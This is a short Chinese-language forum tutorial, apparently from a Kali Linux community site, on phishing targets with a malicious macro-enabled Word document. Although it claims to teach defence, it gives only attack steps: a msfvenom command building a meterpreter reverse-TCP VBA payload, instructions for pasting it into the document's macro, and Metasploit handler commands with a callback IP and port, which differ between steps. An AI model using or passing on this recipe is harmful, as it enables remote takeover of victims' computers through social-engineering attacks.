通过认证邮件获取管理员权限
> 网络认证是我们日常最为常见的一种测试手法,其目的是通过各种社会工程学的方法,让目标打开含有恶意代码的 `word` `excel` `ppt` 等文档。从而获取系统权限,本期学习来说说如何防御这种测试!!(https://blog.bbskali.cn/usr/uploads/2020/04/271899027.png)
#### 首先我们利用 msf 生成 vbs
```
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.95 LPORT=4444 -f vba -o try.vba
```
![生成恶意 shell](https://niu.bbskali.cn/2cbc441419f229086d3025f07ff22cc6)
#### 设置 word
新建一个 word 文档,文件另存为 `启用宏的word` 文档
![启用宏的 word 文档](https://niu.bbskali.cn/0bf3c4f2338cd5277476a26632e6cc4a)
然后 `开发工具`——`visual Basic`
选择我们的项目 `ThisDocument` 双击打开,粘贴我们生成的 shell。
![](https://niu.bbskali.cn/c9ea8f1075a696174317819eafb6460d)
保存完成后,配置 msf。
```
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST ip
LHOST => 106.13.39.165
msf5 exploit(multi/handler) > set LPORT 5555
LPORT => 5555
```
当目标运行 word 文档后,在 msf 中便会得到反弹!
![](https://niu.bbskali.cn/39e5c79b63f59a47df5f9a28d85e96f3)
页:
[1]